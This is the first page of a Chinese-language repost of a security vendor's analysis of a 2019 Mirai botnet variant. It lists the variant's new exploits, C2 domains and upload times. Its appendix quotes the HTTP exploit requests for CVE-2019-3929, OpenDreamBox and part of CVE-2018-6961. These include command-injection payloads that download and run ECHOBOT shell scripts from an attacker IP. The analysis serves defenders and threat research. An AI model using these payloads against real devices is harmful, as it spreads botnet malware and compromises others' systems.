欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

Mirai变种加入8个漏洞利用,攻击iot设备

来源:本站整理 作者:佚名 时间:2019-06-11 TAG: 我要投稿

Palo Alto Networks Unit 42研究人员自2016年开始就一直在持续关注Mirai恶意软件。近期,研究人员发现了Mirai恶意软件的一个新变种,其中加入了8个新的漏洞利用攻击目标还是嵌入式设备。新目标的范围涵盖无线投影系统、机顶盒、SD-WAN、智能家控制器等等。
Mirai最迟使用默认凭证来获取对设备的访问权。从2017年底开始,该恶意软件家族样本开始使用公开的漏洞利用来在有漏洞的设备上传播和与运行。2018年的攻击活动中也有变种不断加入新的漏洞利用,将不同种类的IoT设备加入到僵尸网络中。
从那时起,研究人员发现Mirai恶意软件作者在不断测试新的漏洞利用。最新的Mirai变种中就延续了这一趋势。
漏洞利用
最新的Mirai变种一共含有18个漏洞利用,其中8个是新加入的。这些新加入的漏洞利用包括:
· CVE-2019-3929
· OpenDreamBox远程代码执行漏洞
· CVE-2018-6961
· CVE-2018-7841
· CVE-2018-11510
· Dell KACE远程代码执行漏洞
· CVE-2017-5174
· HooToo TripMate 远程代码执行漏洞
新一种中还含有4个之前Mirai变种中使用过的漏洞利用,包括:
· LG Supersign TVs
· WePresent WiPG-1000 Wireless Presentation Systems
· Belkin WeMo devices
· MiCasaVerde VeraLite Smart Home Controllers
这些新译本中还含有攻击Oracle WebLogic Servers RCE漏洞的漏洞利用,被用于构建Linux和Windows僵尸网络。这些漏洞利用过去都被Mirai变种使用过。
分析
该新变种除了上面提到的漏洞利用外,还有一些新的特征:
· 字符串表所用的加密密钥0xDFDAACFD是基于原始Mirai源代码中的标准加密方案的,这与0x54 XOR的字节序是相同的。
· 而且还有许多用于暴力破解的默认凭证是研究人员之前没见过的。
基础设施
样本所在的开放目录如图1所示:

图1. 保存Mirai变种的开放目录
变种的样本为C2使用了2个域名,位于不同版本的不同端口:
最新版本使用的C2域名为:
· akuma[.]pw :17
· akumaiotsolutions[.]pw:912
目前这两个域名无法解析到任何IP地址,但是通过搜索Shodan,研究人员发现该地址的端口17同时也被用作C2。下图中来自Mirai C2服务器17端口的响应记录表明C2代码是如何写入原始代码的:

图2. Shodan搜索结果表明31.13.195[.]251:17被用作C2
保存恶意软件的目录过一段时间就会更新,最后版本上传的时间为2019年5月26日。每次更新的变化都很小,攻击者要么修改了C2端口号要么稍微修改了payload。
文件上传的时间记录:
· 26-May-2019 10:05
· 21-May-2019 16:34
· 21-May-2019 08:38
· 19-May-2019 06:05
2019年5月21日8点34分上传的版本使用了2个C2域名,为:
· akuma[.]pw:1822
· akumaiotsolutions[.]pw:721
这两个域名也被其他Mirai样本使用过,不同的只是端口:
结论
新发现的Mirai变种是Linux恶意软件开发人员扩展其范围的努力的继续,攻击更大访问、更多数量IOT设备来组成更大规模的僵尸网络来提供更强的DDOS攻击的能力。基于对这些变种的分析,使用漏洞利用是更加高效的,因为感染大量的设备之后可以在之后的变种中继续使用。
附录:8个漏洞利用受影响设备和漏洞利用格式
CVE-2019-3929
漏洞攻击的是多个厂商的Wireless Presentation Systems无线演示系统,漏洞利用格式如下:
POST /cgi-bin/file_transfer.cgi HTTP/1.1
Content-Type: application/x-www-form-urlencoded
 
file_transfer=new&dir=’Pa_Notecd wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp 31.13.195[.]251 -c get ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p anonymous -P 21 31.13.195[.]251 ECHOBOT1.sh ECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf ECHOBOT.*Pa_Note
OpenDreamBox_RCE漏洞
受影响的设备为运行OpenDreamBox 2.0.0的设备,漏洞利用格式如下:
POST /webadmin/script?command=|wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp 31.13.195[.]251 -c get ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p anonymous -P 21 31.13.195[.]251 ECHOBOT1.sh ECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf ECHOBOT.* HTTP/1.1
Content-Length: 630
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: Hello-World
Connection: keep-alive
CVE-2018-6961
漏洞影响设备为VMware NSX SD-WAN Edge版本低于3.1.2的设备,漏洞利用格式为:
POST /scripts/ajaxPortal.lua HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.vmware.com
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

[1] [2] [3]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载